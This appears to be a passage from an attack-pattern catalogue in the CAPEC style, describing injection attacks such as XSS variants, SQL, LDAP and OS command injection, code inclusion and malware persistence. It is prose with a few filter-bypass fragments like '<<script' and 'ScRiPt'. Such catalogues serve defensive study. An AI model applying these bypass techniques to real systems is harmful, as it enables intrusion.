An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 15 (Command Delimiters) > 460 (HTTP Parameter Pollution (HPP))

An adversary adds duplicate HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 182 (Flash Injection)

An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 182 (Flash Injection) > 174 (Flash Parameter Injection)

An adversary takes advantage of improper data validation to inject malicious global parameters into a Flash file embedded within an HTML document. Flash files can leverage user-submitted data to configure the Flash document and access the embedding HTML document.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 182 (Flash Injection) > 178 (Cross-Site Flashing)

An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 6 (Argument Injection)

An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion)

An adversary exploits a weakness on the target to force arbitrary code to be retrieved locally or from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 251 (Local Code Inclusion)

The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 251 (Local Code Inclusion) > 252 (PHP Local File Inclusion)

The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 251 (Local Code Inclusion) > 640 (Inclusion of Code in Existing Process)

The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 251 (Local Code Inclusion) > 660 (Root/Jailbreak Detection Evasion via Hooking)

An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to "hook" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 253 (Remote Code Inclusion)

The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 253 (Remote Code Inclusion) > 101 (Server Side Include (SSI) Injection)

An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 253 (Remote Code Inclusion) > 193 (PHP Remote File Inclusion)

In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 175 (Code Inclusion) > 253 (Remote Code Inclusion) > 500 (WebView Injection)

An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 240 (Resource Injection)

An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 240 (Resource Injection) > 610 (Cellular Data Injection)

Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection)

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 19 (Embedding Scripts within Scripts)

An adversary leverages the capability to execute their own script by embedding it within other scripts that the target software is likely to execute due to programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 23 (File Content Injection)

An adversary poisons files with a malicious payload (targeting the file systems accessible by the target software), which may be passed through by standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes, in order to exploit the host's trust in executing remote content, including binary files.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 23 (File Content Injection) > 44 (Overflow Binary Resource File)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 41 (Using Meta-characters in E-mail Headers to Inject Malicious Payloads)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 468 (Generic Cross-Browser Cross-Domain Theft)

An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS))

An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS)

This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 18 (XSS Targeting Non-Script Elements)

This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an adversary to tunnel through the application's elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote adversary to collect and interpret the output of said attack.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 198 (XSS Targeting Error Pages)

An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 199 (XSS Using Alternate Syntax)

An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 243 (XSS Targeting HTML Attributes)

An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 244 (XSS Targeting URI Placeholders)

An attack of this type exploits the ability of most browsers to interpret "data", "javascript" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 245 (XSS Using Doubled Characters)

The adversary bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<<script or %3C%3script using URI encoding) the filters of some web applications may fail to recognize the presence of a script tag. If the targeted server is vulnerable to this type of bypass, the adversary can create a crafted URL or other trap to cause a victim to view a page on the targeted server where the malicious content is executed, as per a normal XSS attack.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 247 (XSS Using Invalid Characters)

An adversary inserts invalid characters in identifiers to bypass application filtering of input. Filters may not scan beyond invalid characters but during later stages of processing content that follows these invalid characters may still be processed. This allows the adversary to sneak prohibited commands past filters and perform normally prohibited operations. Invalid characters may include null, carriage return, line feed or tab in an identifier. Successful bypassing of the filter can result in a XSS attack, resulting in the disclosure of web cookies or possibly other results.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 32 (XSS Through HTTP Query Strings)

An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim's browser.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 588 (DOM-Based XSS) > 86 (XSS Through HTTP Headers)

An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS)

This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is "reflected" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 18 (XSS Targeting Non-Script Elements)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 198 (XSS Targeting Error Pages)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 199 (XSS Using Alternate Syntax)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 243 (XSS Targeting HTML Attributes)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 244 (XSS Targeting URI Placeholders)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 245 (XSS Using Doubled Characters)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 247 (XSS Using Invalid Characters)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 32 (XSS Through HTTP Query Strings)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 591 (Reflected XSS) > 86 (XSS Through HTTP Headers)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS)

An adversary utilizes a form of Cross-site Scripting (XSS) where a malicious script is persistently "stored" within the data storage of a vulnerable web application as valid input.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 18 (XSS Targeting Non-Script Elements)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 198 (XSS Targeting Error Pages)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 199 (XSS Using Alternate Syntax)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 209 (XSS Using MIME Type Mismatch)

An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 243 (XSS Targeting HTML Attributes)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 244 (XSS Targeting URI Placeholders)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 245 (XSS Using Doubled Characters)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 247 (XSS Using Invalid Characters)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 32 (XSS Through HTTP Query Strings)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 242 (Code Injection) > 63 (Cross-Site Scripting (XSS)) > 592 (Stored XSS) > 86 (XSS Through HTTP Headers)

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection)

An adversary looking to execute a command of their choosing, injects new items into an existing command thus modifying interpretation away from what was intended. Commands in this context are often standalone strings that are interpreted by a downstream component and cause specific responses. This type of attack is possible when untrusted values are used to build these command strings. Weaknesses in input validation or command construction can enable the attack and lead to successful exploitation.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 136 (LDAP Injection)

An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 183 (IMAP/SMTP Command Injection)

An adversary exploits weaknesses in input validation on web-mail servers to execute commands on the IMAP/SMTP server. Web-mail servers often sit between the Internet and the IMAP or SMTP mail server. User requests are received by the web-mail servers which then query the back-end mail server for the requested information and return this response to the user. In an IMAP/SMTP command injection attack, mail-server commands are embedded in parts of the request sent to the web-mail server. If the web-mail server fails to adequately sanitize these requests, these commands are then sent to the back-end mail server when it is queried by the web-mail server, where the commands are then executed. This attack can be especially dangerous since administrators may assume that the back-end server is protected against direct Internet access and therefore may not secure it adequately against the execution of malicious commands.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 250 (XML Injection)

An attacker utilizes crafted XML user-controllable input to probe, attack, and inject data into the XML database, using techniques similar to SQL injection. The user-controllable input can allow for unauthorized viewing of data, bypassing authentication or the front-end application for direct XML database access, and possibly altering database information.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 250 (XML Injection) > 228 (DTD Injection)

An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 250 (XML Injection) > 83 (XPath Injection)

An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 250 (XML Injection) > 84 (XQuery Injection)

This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 40 (Manipulating Writeable Terminal Devices)

This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 66 (SQL Injection)

This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 66 (SQL Injection) > 108 (Command Line Execution through SQL Injection)

An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 66 (SQL Injection) > 109 (Object Relational Mapping Injection)

An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 66 (SQL Injection) > 110 (SQL Injection through SOAP Parameter Tampering)

An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 66 (SQL Injection) > 470 (Expanding Control over the Operating System from the Database)

An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 66 (SQL Injection) > 7 (Blind SQL Injection)

Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 676 (NoSQL Injection)

An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 248 (Command Injection) > 88 (OS Command Injection)

In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code)

An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware)

An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 550 (Install New Service)

When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 551 (Modify Existing Service)

When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 552 (Install Rootkit )

An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 556 (Replace File Extension Handlers)

When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 558 (Replace Trusted Executable)

An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 564 (Run Software at Logon)

Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 579 (Replace Winlogon Helper DLL)

Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 549 (Local Execution of Code) > 542 (Targeted Malware) > 698 (Install Malicious Extension)

An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 624 (Hardware Fault Injection)

The adversary uses disruptive signals or events, or alters the physical environment a device operates in, to cause faulty behavior in electronic devices. This can include electromagnetic pulses, laser pulses, clock glitches, ambient temperature extremes, and more. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.Side-Channel Attack

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 624 (Hardware Fault Injection) > 625 (Mobile Device Fault Injection)

Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 594 (Traffic Injection)

An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 594 (Traffic Injection) > 595 (Connection Reset)

In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.

